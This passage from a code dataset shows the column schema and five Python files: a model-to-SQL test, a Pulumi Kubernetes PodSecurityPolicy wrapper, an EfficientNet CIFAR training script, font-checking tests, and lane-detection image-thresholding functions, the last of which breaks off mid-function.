Dataset schema (one row per column):

| column | type | range |
|---|---|---|
| hexsha | string | length 40 |
| size | int64 | 3 to 1.03M |
| ext | string | 10 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | length 3 to 972 |
| max_stars_repo_name | string | length 6 to 130 |
| max_stars_repo_head_hexsha | string | length 40 to 78 |
| max_stars_repo_licenses | list | length 1 to 10 |
| max_stars_count | int64 (nullable) | 1 to 191k |
| max_stars_repo_stars_event_min_datetime | string (nullable) | length 24 |
| max_stars_repo_stars_event_max_datetime | string (nullable) | length 24 |
| max_issues_repo_path | string | length 3 to 972 |
| max_issues_repo_name | string | length 6 to 130 |
| max_issues_repo_head_hexsha | string | length 40 to 78 |
| max_issues_repo_licenses | list | length 1 to 10 |
| max_issues_count | int64 (nullable) | 1 to 116k |
| max_issues_repo_issues_event_min_datetime | string (nullable) | length 24 |
| max_issues_repo_issues_event_max_datetime | string (nullable) | length 24 |
| max_forks_repo_path | string | length 3 to 972 |
| max_forks_repo_name | string | length 6 to 130 |
| max_forks_repo_head_hexsha | string | length 40 to 78 |
| max_forks_repo_licenses | list | length 1 to 10 |
| max_forks_count | int64 (nullable) | 1 to 105k |
| max_forks_repo_forks_event_min_datetime | string (nullable) | length 24 |
| max_forks_repo_forks_event_max_datetime | string (nullable) | length 24 |
| content | string | length 3 to 1.03M |
| avg_line_length | float64 | 1.13 to 941k |
| max_line_length | int64 | 2 to 941k |
| alphanum_fraction | float64 | 0 to 1 |
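Records with this schema are easier to inspect programmatically than in the flattened view below. A minimal sketch, assuming the rows have been exported to a local JSON Lines file (the filename `code_records.jsonl` and the export step are assumptions, not part of the dataset above):

```python
import pandas as pd

# Load the exported records (hypothetical local file, one JSON object per row).
df = pd.read_json("code_records.jsonl", lines=True)

# Basic sanity checks against the schema above.
assert df["hexsha"].str.len().eq(40).all()      # hexsha is always 40 characters
python_rows = df[df["lang"] == "Python"]        # lang has a single class here

# Inspect the largest files and the distribution of alphanumeric density.
print(python_rows.nlargest(5, "size")[["max_stars_repo_name", "size", "max_line_length"]])
print(python_rows["alphanum_fraction"].describe())
```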
hexsha: 791c916480d1f29765cfd016642d4bb0b4d0aa31 | size: 141 | ext: py | lang: Python
repo: antoinecarme/sklearn2sql_heroku | path: tests/regression/diabetes/ws_diabetes_GradientBoostingRegressor_oracle_code_gen.py | head_hexsha: d680db10683daa419324461eeea851dd8b103ad5 | licenses: ["BSD-3-Clause"] (identical across the max_stars/max_issues/max_forks column groups)
max_stars_count: 1 (2019-07-09T14:45:18.000Z to 2019-07-09T14:45:18.000Z) | max_issues_count: 5 (2017-11-13T13:35:37.000Z to 2021-11-11T12:57:20.000Z) | max_forks_count: 1 (2021-09-19T15:05:33.000Z to 2021-09-19T15:05:33.000Z)
content:
from sklearn2sql_heroku.tests.regression import generic as reg_gen
reg_gen.test_model("GradientBoostingRegressor" , "diabetes" , "oracle")
avg_line_length: 28.2 | max_line_length: 71 | alphanum_fraction: 0.815603
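The record above drives sklearn2sql_heroku's generic regression test harness for GradientBoostingRegressor on the diabetes dataset with an Oracle SQL target. The harness internals are not shown here; the sketch below only reproduces the plain scikit-learn model/dataset pair named by the test (the SQL code-generation step performed by sklearn2sql_heroku is assumed and not reproduced):

```python
from sklearn.datasets import load_diabetes
from sklearn.ensemble import GradientBoostingRegressor

# Fit the model/dataset pair referenced by the test above; SQL generation for
# the "oracle" target happens inside sklearn2sql_heroku and is not shown.
X, y = load_diabetes(return_X_y=True)
model = GradientBoostingRegressor().fit(X, y)
print(model.predict(X[:5]))
```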
hexsha: cba57a828491a4f7d1f33c9519906af64d07ee84 | size: 4,546 | ext: py | lang: Python
repo: vijayraavi/pulumi-kubernetes | path: sdk/python/pulumi_kubernetes/policy/v1beta1/PodSecurityPolicy.py | head_hexsha: 0a18b87fd1b4fa5778542dbb0e82a08a2e91ab88 | licenses: ["Apache-2.0"] (identical across the max_stars/max_issues/max_forks column groups)
max_stars_count: null | max_issues_count: null | max_forks_count: null
content:
# *** WARNING: this file was generated by the Pulumi Kubernetes codegen tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
from typing import Optional
import pulumi
import pulumi.runtime
from pulumi import Input, ResourceOptions
from ... import tables, version
class PodSecurityPolicy(pulumi.CustomResource):
"""
PodSecurityPolicy governs the ability to make requests that affect the Security Context that
will be applied to a pod and container.
"""
apiVersion: pulumi.Output[str]
"""
APIVersion defines the versioned schema of this representation of an object. Servers should
convert recognized schemas to the latest internal value, and may reject unrecognized values.
More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources
"""
kind: pulumi.Output[str]
"""
Kind is a string value representing the REST resource this object represents. Servers may infer
this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More
info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
"""
metadata: pulumi.Output[dict]
"""
Standard object's metadata. More info:
https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#metadata
"""
spec: pulumi.Output[dict]
"""
spec defines the policy enforced.
"""
def __init__(self, resource_name, opts=None, metadata=None, spec=None, __name__=None, __opts__=None):
"""
Create a PodSecurityPolicy resource with the given unique name, arguments, and options.
:param str resource_name: The _unique_ name of the resource.
:param pulumi.ResourceOptions opts: A bag of options that control this resource's behavior.
:param pulumi.Input[dict] metadata: Standard object's metadata. More info:
https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#metadata
:param pulumi.Input[dict] spec: spec defines the policy enforced.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if not resource_name:
raise TypeError('Missing resource name argument (for URN creation)')
if not isinstance(resource_name, str):
raise TypeError('Expected resource name to be a string')
if opts and not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
__props__ = dict()
__props__['apiVersion'] = 'policy/v1beta1'
__props__['kind'] = 'PodSecurityPolicy'
__props__['metadata'] = metadata
__props__['spec'] = spec
__props__['status'] = None
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(
version=version.get_version(),
))
super(PodSecurityPolicy, self).__init__(
"kubernetes:policy/v1beta1:PodSecurityPolicy",
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None):
"""
Get the state of an existing `PodSecurityPolicy` resource, as identified by `id`.
The ID is of the form `[namespace]/[name]`; if `[namespace]` is omitted,
then (per Kubernetes convention) the ID becomes `default/[name]`.
Pulumi will keep track of this resource using `resource_name` as the Pulumi ID.
:param str resource_name: _Unique_ name used to register this resource with Pulumi.
:param pulumi.Input[str] id: An ID for the Kubernetes resource to retrieve.
Takes the form `[namespace]/[name]` or `[name]`.
:param Optional[pulumi.ResourceOptions] opts: A bag of options that control this
resource's behavior.
"""
opts = ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
return PodSecurityPolicy(resource_name, opts)
def translate_output_property(self, prop: str) -> str:
return tables._CASING_FORWARD_TABLE.get(prop) or prop
def translate_input_property(self, prop: str) -> str:
return tables._CASING_BACKWARD_TABLE.get(prop) or prop
avg_line_length: 41.327273 | max_line_length: 107 | alphanum_fraction: 0.683018
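A minimal usage sketch of the generated class above, meant to run inside a Pulumi program with the pulumi_kubernetes SDK installed; the resource name and every spec value below are illustrative and not taken from the record:

```python
from pulumi_kubernetes.policy.v1beta1 import PodSecurityPolicy

# metadata and spec are plain dicts, matching the constructor shown in the file above.
restricted = PodSecurityPolicy(
    "restricted-psp",                       # Pulumi resource name (illustrative)
    metadata={"name": "restricted"},
    spec={
        "privileged": False,
        "seLinux": {"rule": "RunAsAny"},
        "runAsUser": {"rule": "MustRunAsNonRoot"},
        "supplementalGroups": {"rule": "RunAsAny"},
        "fsGroup": {"rule": "RunAsAny"},
        "volumes": ["configMap", "secret", "emptyDir"],
    },
)
```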
hexsha: e95a382de6039ff66f7a286f90e8b497cd63a933 | size: 18,288 | ext: py | lang: Python
repo: Lornatang/EfficientNet | path: examples/cifar/main.py | head_hexsha: 1b8718735888aa21fbef78b825af1dacd3c257a2 | licenses: ["Apache-2.0"] (identical across the max_stars/max_issues/max_forks column groups)
max_stars_count: 4 (2020-01-12T01:02:04.000Z to 2020-04-10T00:32:05.000Z) | max_issues_count: null | max_forks_count: null
content:
# Copyright 2020 Lorna Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Evaluate on CIFAR. Note that at the moment, training is not implemented (I am working on it).
That being said, evaluation is working.
"""
import argparse
import os
import random
import shutil
import time
import warnings
import PIL
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.distributed as dist
import torch.optim
import torch.multiprocessing as mp
import torch.utils.data
import torch.utils.data.distributed
import torchvision.transforms as transforms
import torchvision.datasets as datasets
import torchvision.models as models
from efficientnet import EfficientNet
from apex import amp
parser = argparse.ArgumentParser(description='PyTorch CIFAR Training')
parser.add_argument('data', metavar='DIR', default='data',
help='path to dataset')
parser.add_argument('-a', '--arch', metavar='ARCH', default='resnet18',
help='model architecture (default: resnet18)')
parser.add_argument('-j', '--workers', default=1, type=int, metavar='N',
help='number of data loading workers (default: 1)')
parser.add_argument('--epochs', default=90, type=int, metavar='N',
help='number of total epochs to run')
parser.add_argument('--start-epoch', default=0, type=int, metavar='N',
help='manual epoch number (useful on restarts)')
parser.add_argument('-b', '--batch-size', default=256, type=int,
metavar='N',
help='mini-batch size (default: 256), this is the total '
'batch size of all GPUs on the current node when '
'using Data Parallel or Distributed Data Parallel')
parser.add_argument('--lr', '--learning-rate', default=0.1, type=float,
metavar='LR', help='initial learning rate', dest='lr')
parser.add_argument('--momentum', default=0.9, type=float, metavar='M',
help='momentum')
parser.add_argument('--wd', '--weight-decay', default=1e-4, type=float,
metavar='W', help='weight decay (default: 1e-4)',
dest='weight_decay')
parser.add_argument('-p', '--print-freq', default=10, type=int,
metavar='N', help='print frequency (default: 10)')
parser.add_argument('--resume', default='', type=str, metavar='PATH',
help='path to latest checkpoint (default: none)')
parser.add_argument('--opt_level', default="O1", type=str,
help="Choose which accuracy to train. (default: 'O1')")
parser.add_argument('-e', '--evaluate', dest='evaluate', action='store_true',
help='evaluate model on validation set')
parser.add_argument('--pretrained', dest='pretrained', action='store_true',
help='use pre-trained model')
parser.add_argument('--world-size', default=-1, type=int,
help='number of nodes for distributed training')
parser.add_argument('--rank', default=-1, type=int,
help='node rank for distributed training')
parser.add_argument('--dist-url', default='tcp://224.66.41.62:23456', type=str,
help='url used to set up distributed training')
parser.add_argument('--dist-backend', default='nccl', type=str,
help='distributed backend')
parser.add_argument('--seed', default=None, type=int,
help='seed for initializing training. ')
parser.add_argument('--gpu', default=None, type=int,
help='GPU id to use.')
parser.add_argument('--image_size', default=32, type=int,
                    help='image size')
parser.add_argument('--num_classes', default=10, type=int,
                    help='number of dataset classes (CIFAR-10 default); read as '
                         'args.num_classes when loading a pretrained EfficientNet')
parser.add_argument('--advprop', default=False, action='store_true',
help='use advprop or not')
parser.add_argument('--multiprocessing-distributed', action='store_true',
help='Use multi-processing distributed training to launch '
'N processes per node, which has N GPUs. This is the '
'fastest way to use PyTorch for either single node or '
'multi node data parallel training')
best_acc1 = 0
def main():
args = parser.parse_args()
if args.seed is not None:
random.seed(args.seed)
torch.manual_seed(args.seed)
cudnn.deterministic = True
warnings.warn('You have chosen to seed training. '
'This will turn on the CUDNN deterministic setting, '
'which can slow down your training considerably! '
'You may see unexpected behavior when restarting '
'from checkpoints.')
if args.gpu is not None:
warnings.warn('You have chosen a specific GPU. This will completely '
'disable data parallelism.')
if args.dist_url == "env://" and args.world_size == -1:
args.world_size = int(os.environ["WORLD_SIZE"])
args.distributed = args.world_size > 1 or args.multiprocessing_distributed
ngpus_per_node = torch.cuda.device_count()
if args.multiprocessing_distributed:
# Since we have ngpus_per_node processes per node, the total world_size
# needs to be adjusted accordingly
args.world_size = ngpus_per_node * args.world_size
# Use torch.multiprocessing.spawn to launch distributed processes: the
# main_worker process function
mp.spawn(main_worker, nprocs=ngpus_per_node, args=(ngpus_per_node, args))
else:
# Simply call main_worker function
main_worker(args.gpu, ngpus_per_node, args)
def main_worker(gpu, ngpus_per_node, args):
global best_acc1
args.gpu = gpu
if args.gpu is not None:
print("Use GPU: {} for training".format(args.gpu))
if args.distributed:
if args.dist_url == "env://" and args.rank == -1:
args.rank = int(os.environ["RANK"])
if args.multiprocessing_distributed:
# For multiprocessing distributed training, rank needs to be the
# global rank among all the processes
args.rank = args.rank * ngpus_per_node + gpu
dist.init_process_group(backend=args.dist_backend, init_method=args.dist_url,
world_size=args.world_size, rank=args.rank)
# create model
if 'efficientnet' in args.arch: # NEW
if args.pretrained:
model = EfficientNet.from_pretrained(args.arch, advprop=args.advprop, num_classes=args.num_classes)
print("=> using pre-trained model '{}'".format(args.arch))
else:
print("=> creating model '{}'".format(args.arch))
model = EfficientNet.from_name(args.arch)
else:
if args.pretrained:
print("=> using pre-trained model '{}'".format(args.arch))
model = models.__dict__[args.arch](pretrained=True)
else:
print("=> creating model '{}'".format(args.arch))
model = models.__dict__[args.arch]()
if args.distributed:
# For multiprocessing distributed, DistributedDataParallel constructor
# should always set the single device scope, otherwise,
# DistributedDataParallel will use all available devices.
if args.gpu is not None:
torch.cuda.set_device(args.gpu)
model.cuda(args.gpu)
# When using a single GPU per process and per
# DistributedDataParallel, we need to divide the batch size
# ourselves based on the total number of GPUs we have
args.batch_size = int(args.batch_size / ngpus_per_node)
args.workers = int(args.workers / ngpus_per_node)
model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.gpu])
else:
model.cuda()
# DistributedDataParallel will divide and allocate batch_size to all
# available GPUs if device_ids are not set
model = torch.nn.parallel.DistributedDataParallel(model)
elif args.gpu is not None:
torch.cuda.set_device(args.gpu)
model = model.cuda(args.gpu)
else:
# DataParallel will divide and allocate batch_size to all available GPUs
if args.arch.startswith('alexnet') or args.arch.startswith('vgg'):
model.features = torch.nn.DataParallel(model.features)
model.cuda()
else:
model = torch.nn.DataParallel(model).cuda()
# define loss function (criterion) and optimizer
criterion = nn.CrossEntropyLoss().cuda(args.gpu)
optimizer = torch.optim.SGD(model.parameters(), args.lr,
momentum=args.momentum,
weight_decay=args.weight_decay)
model, optimizer = amp.initialize(model, optimizer, opt_level=args.opt_level)
# optionally resume from a checkpoint
if args.resume:
if os.path.isfile(args.resume):
print(f"=> loading checkpoint '{args.resume}'")
checkpoint = torch.load(args.resume)
args.start_epoch = checkpoint['epoch']
best_acc1 = checkpoint['best_acc1']
if args.gpu is not None:
# best_acc1 may be from a checkpoint from a different GPU
best_acc1 = best_acc1.to(args.gpu)
model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
print(f"=> loaded checkpoint '{args.resume}' (epoch {checkpoint['epoch']})")
else:
print(f"=> no checkpoint found at '{args.resume}'")
cudnn.benchmark = True
# Data loading code
traindir = os.path.join(args.data, 'train')
valdir = os.path.join(args.data, 'val')
if args.advprop:
normalize = transforms.Lambda(lambda img: img * 2.0 - 1.0)
else:
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
train_dataset = datasets.ImageFolder(
traindir,
transforms.Compose([
transforms.RandomResizedCrop(32),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize,
]))
if args.distributed:
train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset)
else:
train_sampler = None
train_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=args.batch_size, shuffle=(train_sampler is None),
num_workers=args.workers, pin_memory=True, sampler=train_sampler)
if 'efficientnet' in args.arch:
image_size = 32
val_transforms = transforms.Compose([
transforms.Resize(image_size, interpolation=PIL.Image.BICUBIC),
transforms.CenterCrop(image_size),
transforms.ToTensor(),
normalize,
])
print('Using image size', image_size)
else:
val_transforms = transforms.Compose([
transforms.Resize(36),
transforms.CenterCrop(32),
transforms.ToTensor(),
normalize,
])
print('Using image size', 32)
val_loader = torch.utils.data.DataLoader(
datasets.ImageFolder(valdir, val_transforms),
batch_size=args.batch_size, shuffle=False,
num_workers=args.workers, pin_memory=True)
if args.evaluate:
res = validate(val_loader, model, criterion, args)
with open('res.txt', 'w') as f:
print(res, file=f)
return
for epoch in range(args.start_epoch, args.epochs):
if args.distributed:
train_sampler.set_epoch(epoch)
adjust_learning_rate(optimizer, epoch, args)
# train for one epoch
train(train_loader, model, criterion, optimizer, epoch, args)
# evaluate on validation set
acc1 = validate(val_loader, model, criterion, args)
# remember best acc@1 and save checkpoint
is_best = acc1 > best_acc1
best_acc1 = max(acc1, best_acc1)
if not args.multiprocessing_distributed or (args.multiprocessing_distributed
and args.rank % ngpus_per_node == 0):
save_checkpoint({
'epoch': epoch + 1,
'arch': args.arch,
'state_dict': model.state_dict(),
'best_acc1': best_acc1,
'optimizer': optimizer.state_dict(),
}, is_best)
def train(train_loader, model, criterion, optimizer, epoch, args):
batch_time = AverageMeter('Time', ':6.3f')
data_time = AverageMeter('Data', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
top1 = AverageMeter('Acc@1', ':6.2f')
top5 = AverageMeter('Acc@5', ':6.2f')
progress = ProgressMeter(len(train_loader), batch_time, data_time, losses, top1,
top5, prefix="Epoch: [{}]".format(epoch))
# switch to train mode
model.train()
end = time.time()
for i, (images, target) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
if args.gpu is not None:
images = images.cuda(args.gpu, non_blocking=True)
target = target.cuda(args.gpu, non_blocking=True)
# compute output
output = model(images)
loss = criterion(output, target)
# measure accuracy and record loss
acc1, acc5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), images.size(0))
top1.update(acc1[0], images.size(0))
top5.update(acc5[0], images.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
with amp.scale_loss(loss, optimizer) as scaled_loss:
scaled_loss.backward()
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0:
progress.print(i)
def validate(val_loader, model, criterion, args):
batch_time = AverageMeter('Time', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
top1 = AverageMeter('Acc@1', ':6.2f')
top5 = AverageMeter('Acc@5', ':6.2f')
progress = ProgressMeter(len(val_loader), batch_time, losses, top1, top5,
prefix='Test: ')
# switch to evaluate mode
model.eval()
with torch.no_grad():
end = time.time()
for i, (images, target) in enumerate(val_loader):
if args.gpu is not None:
images = images.cuda(args.gpu, non_blocking=True)
target = target.cuda(args.gpu, non_blocking=True)
# compute output
output = model(images)
loss = criterion(output, target)
# measure accuracy and record loss
acc1, acc5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), images.size(0))
top1.update(acc1[0], images.size(0))
top5.update(acc5[0], images.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0:
progress.print(i)
# TODO: this should also be done with the ProgressMeter
print(' * Acc@1 {top1.avg:.3f} Acc@5 {top5.avg:.3f}'
.format(top1=top1, top5=top5))
return top1.avg
def save_checkpoint(state, is_best, filename="checkpoint.pth"):
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, "model_best.pth")
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self, name, fmt=':f'):
self.name = name
self.fmt = fmt
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def __str__(self):
fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'
return fmtstr.format(**self.__dict__)
class ProgressMeter(object):
def __init__(self, num_batches, *meters, prefix=""):
self.batch_fmtstr = self._get_batch_fmtstr(num_batches)
self.meters = meters
self.prefix = prefix
def print(self, batch):
entries = [self.prefix + self.batch_fmtstr.format(batch)]
entries += [str(meter) for meter in self.meters]
print('\t'.join(entries))
def _get_batch_fmtstr(self, num_batches):
num_digits = len(str(num_batches // 1))
fmt = '{:' + str(num_digits) + 'd}'
return '[' + fmt + '/' + fmt.format(num_batches) + ']'
def adjust_learning_rate(optimizer, epoch, args):
"""Sets the learning rate to the initial LR decayed by 10 every 30 epochs"""
lr = args.lr * (0.1 ** (epoch // 30))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
def accuracy(output, target, topk=(1,)):
"""Computes the accuracy over the k top predictions for the specified values of k"""
with torch.no_grad():
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
            correct_k = correct[:k].reshape(-1).float().sum(0, keepdim=True)  # reshape avoids a non-contiguous view error
res.append(correct_k.mul_(100.0 / batch_size))
return res
if __name__ == '__main__':
main()
avg_line_length: 38.910638 | max_line_length: 111 | alphanum_fraction: 0.611877
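The learning-rate policy in adjust_learning_rate() above is a plain step decay (divide by 10 every 30 epochs). A tiny standalone illustration of the schedule it produces with the default --lr 0.1:

```python
# Reproduce the step-decay formula used by adjust_learning_rate() in main.py above.
base_lr = 0.1
for epoch in (0, 29, 30, 59, 60, 90):
    lr = base_lr * (0.1 ** (epoch // 30))
    print(f"epoch {epoch:2d} -> lr {lr:g}")  # 0.1, 0.1, 0.01, 0.01, 0.001, 0.0001
```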
hexsha: f14cecca50c37646ab2f9ff0ec514500a8fad959 | size: 2,286 | ext: py | lang: Python
repo: m4rc1e/fontbakery | path: tests/specifications/post_test.py | head_hexsha: da4c4b69abdd41314f9bdb58d9e47722e0680816 | licenses: ["Apache-2.0"] (identical across the max_stars/max_issues/max_forks column groups)
max_stars_count: null | max_issues_count: null | max_forks_count: null
content:
import pytest
from fontbakery.checkrunner import (
DEBUG
, INFO
, WARN
, ERROR
, SKIP
, PASS
, FAIL
)
check_statuses = (ERROR, FAIL, SKIP, PASS, WARN, INFO, DEBUG)
from fontTools.ttLib import TTFont
mada_fonts = [
"data/test/mada/Mada-Black.ttf",
"data/test/mada/Mada-ExtraLight.ttf",
"data/test/mada/Mada-Medium.ttf",
"data/test/mada/Mada-SemiBold.ttf",
"data/test/mada/Mada-Bold.ttf",
"data/test/mada/Mada-Light.ttf",
"data/test/mada/Mada-Regular.ttf",
]
@pytest.fixture
def mada_ttFonts():
return [TTFont(path) for path in mada_fonts]
def test_check_008(mada_ttFonts):
""" Fonts have consistent underline thickness ? """
from fontbakery.specifications.post import com_google_fonts_check_008 as check
# We start with our reference Mada font family,
# which we know has the same value of post.underlineThickness
  # across all of its font files, based on our inspection
# of the file contents using TTX.
#
# So the check should PASS in this case:
print('Test PASS with a good family.')
status, message = list(check(mada_ttFonts))[-1]
assert status == PASS
# Then we introduce the issue by setting a
# different underlineThickness value in just
# one of the font files:
value = mada_ttFonts[0]['post'].underlineThickness
incorrect_value = value + 1
mada_ttFonts[0]['post'].underlineThickness = incorrect_value
# And now re-running the check on the modified
# family should result in a FAIL:
print('Test FAIL with an inconsistent family.')
status, message = list(check(mada_ttFonts))[-1]
assert status == FAIL
def test_check_015():
""" Font has post table version 2 ? """
from fontbakery.specifications.post import com_google_fonts_check_015 as check
print('Test PASS with good font.')
  # Our reference Mada family is known to be good here.
ttFont = TTFont("data/test/mada/Mada-Regular.ttf")
status, message = list(check(ttFont, 'glyf' in ttFont))[-1]
assert status == PASS
# modify the post table version
ttFont['post'].formatType = 3
  print('Test FAIL with a font whose post table version is not 2.')
status, message = list(check(ttFont, 'glyf' in ttFont))[-1]
assert status == FAIL
avg_line_length: 30.48 | max_line_length: 80 | alphanum_fraction: 0.692476
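Both tests above hinge on two fields of the font's post table; a minimal fontTools sketch of reading them directly (the path is one of the Mada fixtures listed in the test module):

```python
from fontTools.ttLib import TTFont

# Inspect the two post-table fields exercised by the tests above.
font = TTFont("data/test/mada/Mada-Regular.ttf")
post = font["post"]
print(post.underlineThickness)  # value compared across the family in test_check_008
print(post.formatType)          # expected to be version 2 in test_check_015
```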
hexsha: b360ec5333b437a2c22eff10f181ee34e18c9c64 | size: 7,021 | ext: py | lang: Python
repo: kavach-feature/Advanced_lane_finding | path: libs/dir_sobel_color_persp_warp_func.py | head_hexsha: 12e4e330e338734fdb35655c7581b98ba1eb490b | licenses: ["MIT"] (identical across the max_stars/max_issues/max_forks column groups)
max_stars_count: null | max_issues_count: null | max_forks_count: null
content:
import numpy as np
import cv2
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import glob
objpoints=[]
imgpoints=[]
objp=np.zeros((6*9,3), np.float32)
objp[:,:2]= np.mgrid[0:9,0:6].T.reshape(-1,2)
# Defines a function that applies Sobel x and y,
# then computes the direction of the gradient
# and applies a threshold.
def abs_sobel_thresh(img, orient='x', sobel_kernel = 3, thresh=(0,255)):
# Grayscale
gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
# Apply cv2.Sobel()
if orient == 'x':
sobel_orient= cv2.Sobel(gray,cv2.CV_64F,1,0)
elif orient == 'y':
sobel_orient= cv2.Sobel(gray,cv2.CV_64F,0,1)
# Take the absolute value of the output from cv2.Sobel()
abs_sobel = np.absolute(sobel_orient)
# Scale the result to an 8-bit range (0-255)
scaled_sobel= np.uint8(255*abs_sobel/np.max(abs_sobel))
binary_output= np.zeros_like(scaled_sobel)
# Apply lower and upper thresholds
binary_output [(scaled_sobel >=thresh[0])&(scaled_sobel<=thresh[1])]=1
# Create binary_output
return binary_output
def mag_thresh(img, sobel_kernel=3, mag_thresh=(0, 255)):
# Grayscale
# Apply the following steps to img
# 1) Convert to grayscale
gray=cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)
# 2) Take the gradient in x and y separately
sobel_orient_x = cv2.Sobel(gray,cv2.CV_64F,1,0,ksize=sobel_kernel)
sobel_orient_y = cv2.Sobel(gray,cv2.CV_64F,0,1,ksize=sobel_kernel)
# 3) Calculate the magnitude
abs_sobel= np.sqrt(sobel_orient_x**2 + sobel_orient_y**2)
# 4) Scale to 8-bit (0 - 255) and convert to type = np.uint8
scaled_sobel=np.uint8(255*abs_sobel/np.max(abs_sobel))
# 5) Create a binary mask where mag thresholds are met
binary_output=np.zeros_like(scaled_sobel)
binary_output[(scaled_sobel>=mag_thresh[0]) & (scaled_sobel<=mag_thresh[1])]=1
# 6) Return this mask as your binary_output image
#binary_output = np.copy(img) # Remove this line
return binary_output
def dir_threshold(img, sobel_kernel=3, thresh=(0, np.pi/2)):
# Apply the following steps to img
# 1) Convert to grayscale
gray=cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)
# 2) Take the gradient in x and y separately
sobel_orient_x = cv2.Sobel(gray,cv2.CV_64F,1,0,ksize=sobel_kernel)
sobel_orient_y= cv2.Sobel(gray,cv2.CV_64F,0,1,ksize=sobel_kernel)
# 3) Take the absolute value of the x and y gradients
abs_sobelx=np.absolute(sobel_orient_x)
abs_sobely=np.absolute(sobel_orient_y)
# 4) Use np.arctan2(abs_sobely, abs_sobelx) to calculate the direction of the gradient
dir_gradient = np.arctan2(abs_sobely,abs_sobelx)
# 5) Create a binary mask where direction thresholds are met
binary_output= np.zeros_like(dir_gradient)
binary_output[(dir_gradient>= thresh[0])& (dir_gradient<= thresh[1])]=1
# 6) Return this mask as your binary_output image
#binary_output = np.copy(img) # Remove this line
return binary_output
def hls_select(img, thresh=(0, 255)):
# 1) Convert to HLS color space
hls_image= cv2.cvtColor(img,cv2.COLOR_RGB2HLS)
S=hls_image[:,:,2]
    # 2) Apply a threshold to the S channel
    # (note: the fixed (190, 255) range below overrides the unused `thresh` parameter)
    threshold=(190,255)
# 3) Return a binary image of threshold result
#binary_output = np.copy(img) # placeholder line
binary_output= np.zeros_like(S)
binary_output[(S>=threshold[0])&(S<=threshold[1])]=1
return binary_output
def birds_eye_view(image):
img_size= (image.shape[1],image.shape[0])
src = np.float32(
[[490,480],
[810,480],
[1250,720],
[140,720]])
dst = np.float32(
[[0,0],
[1280,0],
[1250,720],
[140,720]])
M = cv2.getPerspectiveTransform(src,dst)
Minv = cv2.getPerspectiveTransform(dst, src)
warped_image = cv2.warpPerspective(image,M, img_size,flags=cv2.INTER_NEAREST)
return warped_image, Minv
def create_threshold_binary_image(image,ksize=3):
ksize=3
gradx=abs_sobel_thresh(image,orient='x',sobel_kernel=ksize,thresh=(20,100))
grady=abs_sobel_thresh(image,orient='y',sobel_kernel=ksize,thresh=(20,100))
#Applying magnitude threshold
mag_binary = mag_thresh(image,sobel_kernel=ksize,mag_thresh=(30,100))
#Applying threshold where the vertical direction of the gradient is met
dir_output= dir_threshold(image,sobel_kernel=ksize,thresh=(0.7,1.3))
#Applying HLS color space threshold
hls_output = hls_select(image)
"""Creating a binary image where only non-zero pixels meeting absolute Sobelx threshold,
magnitude based threshold (for Sobelx and Sobel y) and direction gradient meets the criteria"""
combined = np.zeros_like(dir_output)
combined [(gradx==1)&(grady ==1)| (mag_binary ==1)& (dir_output ==1)] =1
combined_with_color_threshold=np.zeros_like(combined)
combined_with_color_threshold [(hls_output==1)|(combined==1)]=1
#combined_with_color_threshold [(combined==1)]=1
return combined_with_color_threshold
def render_original_combined_transforms_image(image1, image2,image2_title ="Processed Image"):
f, (ax1, ax2) = plt.subplots(1, 2, figsize=(17, 9))
f.tight_layout()
ax1.imshow(image1,cmap='gray')
ax1.set_title("Original Image", fontsize=10)
ax2.imshow(image2,cmap='gray')
